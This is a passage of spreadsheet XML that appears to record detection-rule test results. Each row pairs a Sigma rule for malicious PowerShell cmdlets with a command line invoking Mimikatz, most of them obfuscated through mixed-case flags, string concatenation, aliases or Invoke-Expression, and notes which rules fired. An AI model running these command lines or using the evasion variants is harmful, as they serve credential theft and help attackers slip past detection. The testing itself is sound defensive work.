      <c r="I2139" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2139" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2139" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2140" ht="15.75" customHeight="1" s="42">
      <c r="A2140" s="43" t="n"/>
      <c r="B2140" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2140" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2140" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2140" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F2140" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2140" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2140" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2140" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2140" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2140" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2141" ht="15.75" customHeight="1" s="42">
      <c r="A2141" s="43" t="n"/>
      <c r="B2141" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2141" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2141" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2141" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMMand "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F2141" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2141" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2141" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2141" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2141" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2141" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2142" ht="15.75" customHeight="1" s="42">
      <c r="A2142" s="43" t="n"/>
      <c r="B2142" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2142" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2142" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2142" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAND "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F2142" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2142" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2142" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2142" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2142" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2142" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2143" ht="15.75" customHeight="1" s="42">
      <c r="A2143" s="43" t="n"/>
      <c r="B2143" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2143" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2143" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2143" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2143" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2143" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2143" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I214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43" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2143" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2144" ht="15.75" customHeight="1" s="42">
      <c r="A2144" s="43" t="n"/>
      <c r="B2144" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2144" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2144" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2144" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2144" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2144" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2144" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I214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44" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2144" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2145" ht="15.75" customHeight="1" s="42">
      <c r="A2145" s="43" t="n"/>
      <c r="B2145" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2145" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2145" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2145" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmanD "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2145" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2145" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2145" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I214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45" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2145" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2146" ht="15.75" customHeight="1" s="42">
      <c r="A2146" s="43" t="n"/>
      <c r="B2146" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2146" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2146" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2146" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmManD "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2146" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2146" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2146" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I21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46" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2146" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2147" ht="15.75" customHeight="1" s="42">
      <c r="A2147" s="43" t="n"/>
      <c r="B2147" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2147" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2147" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2147" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F2147" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2147" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2147" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2147" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2147" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2147" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2148" ht="15.75" customHeight="1" s="42">
      <c r="A2148" s="43" t="n"/>
      <c r="B2148" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2148" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2148" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2148" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F2148" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2148" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2148" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2148" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2148" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2148" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2149" ht="15.75" customHeight="1" s="42">
      <c r="A2149" s="43" t="n"/>
      <c r="B2149" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2149" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2149" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2149" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMand "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F2149" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2149" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2149" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2149" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2149" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2149" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2150" ht="15.75" customHeight="1" s="42">
      <c r="A2150" s="43" t="n"/>
      <c r="B2150" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2150" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2150" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2150" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmaNd "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F2150" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2150" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2150" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2150" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2150" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2150" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2151" ht="15.75" customHeight="1" s="42">
      <c r="A2151" s="43" t="n"/>
      <c r="B2151" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2151" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2151" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2151" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComManD "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F2151" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2151" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2151" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2151" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2151" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2151" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2152" ht="15.75" customHeight="1" s="42">
      <c r="A2152" s="43" t="n"/>
      <c r="B2152" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2152" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2152" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2152" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2152" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2152" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2152" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I215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2" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2152" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2153" ht="15.75" customHeight="1" s="42">
      <c r="A2153" s="43" t="n"/>
      <c r="B2153" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2153" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2153" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2153" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2153" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2153" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2153" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I215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3" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2153" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2154" ht="15.75" customHeight="1" s="42">
      <c r="A2154" s="43" t="n"/>
      <c r="B2154" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2154" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2154" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2154" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2154" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2154" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2154" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I215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4" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2154" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2155" ht="15.75" customHeight="1" s="42">
      <c r="A2155" s="43" t="n"/>
      <c r="B2155" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2155" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2155" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2155" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMAND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2155" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2155" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2155" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I215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5" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2155" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2156" ht="15.75" customHeight="1" s="42">
      <c r="A2156" s="43" t="n"/>
      <c r="B2156" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2156" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2156" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2156" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmANd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2156" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2156" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2156" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I215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6" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2156" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2157" ht="15.75" customHeight="1" s="42">
      <c r="A2157" s="43" t="n"/>
      <c r="B2157" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2157" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2157" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2157" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaNd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2157" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2157" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2157" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I215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7" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2157" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2158" ht="15.75" customHeight="1" s="42">
      <c r="A2158" s="43" t="n"/>
      <c r="B2158" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2158" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2158" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2158" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnD "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2158" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2158" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2158" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I21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8" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2158" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2159" ht="15.75" customHeight="1" s="42">
      <c r="A2159" s="43" t="n"/>
      <c r="B2159" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2159" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2159" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2159" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2159" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2159" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2159" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I21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59" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2159" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2160" ht="15.75" customHeight="1" s="42">
      <c r="A2160" s="43" t="n"/>
      <c r="B2160" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2160" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2160" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2160" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmAnd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2160" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2160" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2160" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I216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0" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2160" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2161" ht="15.75" customHeight="1" s="42">
      <c r="A2161" s="43" t="n"/>
      <c r="B2161" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2161" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2161" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2161" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmAnd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2161" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2161" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2161" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I216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1" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2161" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2162" ht="15.75" customHeight="1" s="42">
      <c r="A2162" s="43" t="n"/>
      <c r="B2162" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2162" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2162" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2162" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAnD "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2162" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2162" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2162" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I21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2" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2162" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2163" ht="15.75" customHeight="1" s="42">
      <c r="A2163" s="43" t="n"/>
      <c r="B2163" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2163" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2163" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2163" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMand "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2163" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2163" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2163" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I216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3" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2163" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2164" ht="15.75" customHeight="1" s="42">
      <c r="A2164" s="43" t="n"/>
      <c r="B2164" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2164" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2164" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2164" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2164" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2164" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2164" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I21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4" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2164" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2165" ht="15.75" customHeight="1" s="42">
      <c r="A2165" s="43" t="n"/>
      <c r="B2165" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2165" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2165" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2165" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMANd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2165" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2165" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2165" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I21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5" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2165" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2166" ht="15.75" customHeight="1" s="42">
      <c r="A2166" s="43" t="n"/>
      <c r="B2166" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2166" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2166" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2166" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2166" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2166" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2166" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I216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6" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2166" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2167" ht="15.75" customHeight="1" s="42">
      <c r="A2167" s="43" t="n"/>
      <c r="B2167" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2167" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
